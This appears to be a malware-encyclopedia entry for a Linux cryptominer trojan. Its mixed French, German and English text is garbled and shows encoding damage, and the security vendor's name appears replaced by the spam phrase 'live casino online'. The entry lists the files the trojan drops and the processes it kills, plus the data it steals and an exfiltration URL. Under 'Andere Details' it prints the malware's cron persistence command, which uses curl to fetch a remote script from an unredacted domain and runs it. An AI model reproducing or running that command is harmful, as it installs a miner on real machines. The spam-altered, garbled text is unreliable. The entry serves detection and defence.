Analys¨¦ par: Joshua Paul Ignacio   
 

N/A

 Plate-forme:

Linux

 Overall Risk:
 Dommages potentiels: :
 Distribution potentielle: :
 reportedInfection:
 Information Exposure Rating::
Faible
Medium
?±ô±ð±¹¨¦
Critique

  • Type de grayware:
    Trojan

  • Destructif:
    Non

  • Chiffrement:
    Non

  • In the wild::
    Oui

  Overview

Voie d'infection: Aus dem Internet heruntergeladen, Fallen gelassen von anderer Malware

Wird m?glicherweise von anderer Malware/Grayware/Spyware von externen Sites heruntergeladen.

L?scht Dateien, so dass Programme und Anwendungen nicht ordnungsgem?? ausgef¨¹hrt werden.

L?scht sich nach der Ausf¨¹hrung selbst.

  D¨¦tails techniques

File size: 1,927 bytes
File type: , Other
Memory resident: Non
Date de r¨¦ception des premiers ¨¦chantillons: 06 janvier 2020
Charge malveillante: Connects to URLs/IPs, Steals information, Downloads files

?bertragungsdetails

Wird m?glicherweise von der folgenden Malware/Grayware/Spyware von externen Sites heruntergeladen:

Installation

Schleust die folgenden Dateien ein und f¨¹hrt sie aus:

  • x
  • start.pl

Erstellt die folgenden Ordner:

  • /var/tmp/.nano
  • /tmp/.vd

Andere System?nderungen

L?scht die folgenden Dateien:

  • nohup.out
  • /tmp/min.sh
  • /tmp/min
  • /tmp/nohup.out
  • /tmp/cron.d
  • /var/tmp/.nano
  • /{Current Directory}/cron.d
  • cron.d
  • .bin
  • /dev/shm/.bin
  • /tmp/.bin
  • /dev/shm/monero.tgz
  • .vd
  • /tmp/.vd
  • /tmp/.vd/sslm.tgz
  • min*
  • {Current Directory}/min*
  • /tmp/min*

Prozessbeendigung

Beendet die folgenden Prozesse, wenn sie im Speicher des betroffenen Systems ausgef¨¹hrt werden:

  • rand
  • rx
  • rd
  • tsm
  • tsm2
  • haiduc
  • a
  • sparky
  • sh
  • 2238Xae
  • b
  • f
  • i
  • p
  • y
  • rsync
  • ps
  • go
  • x
  • s
  • b
  • run
  • idle
  • minerd
  • crond
  • yam
  • xmr
  • python
  • cron
  • ntpd
  • start
  • start.sh
  • libssl
  • sparky.sh

Download-Routine

Speichert die heruntergeladenen Dateien unter den folgenden Namen:

Datendiebstahl

Folgende Daten werden gesammelt:

  • Current Directory
  • username
  • System time and date
  • Kernel Information
  • Number of Processing Units
  • List of Display Interface

Entwendete Daten

Sendet die gesammelten Daten ¨¹ber HTTP-POST an den folgenden URL:

  • http://{BLOCKED}ter.com/assets/.style/remote/info.php

Andere Details

Es macht Folgendes:

  • It creates the following cron jobs for persistence:
    Path: {Current Directory}/cron.d
    • Schedule: Every 30 minutes
    • Command: */30 * * * * /var/tmp/.nano/nano.sh &> /dev/null @reboot /bin/mkdir /var/tmp/.nnao && /usr/bin/curl -s https://upajmeter.com/assets/.style/nano.sh && /bin/chmod +x /var/tmp/.nano/nano.sh && /var/tmp/.nano/nano.sh

L?scht sich nach der Ausf¨¹hrung selbst.

  Solutions

Moteur de scan minimum: 9.850
First VSAPI Pattern File: 15.608.01
First VSAPI Pattern Release Date: 07 janvier 2020
VSAPI OPR Pattern Version: 15.609.00
VSAPI OPR Pattern Release Date: 08 janvier 2020

Durchsuchen Sie Ihren Computer mit Ihrem live casino online Produkt, und l?schen Sie Dateien, die als Trojan.SH.MALXMR.UWEJS entdeckt werden. Falls die entdeckten Dateien bereits von Ihrem live casino online Produkt ges?ubert, gel?scht oder in Quarant?ne verschoben wurden, sind keine weiteren Schritte erforderlich. Dateien in Quarant?ne k?nnen einfach gel?scht werden. Auf dieser finden Sie weitere Informationen.


Participez ¨¤ notre enqu¨ºte!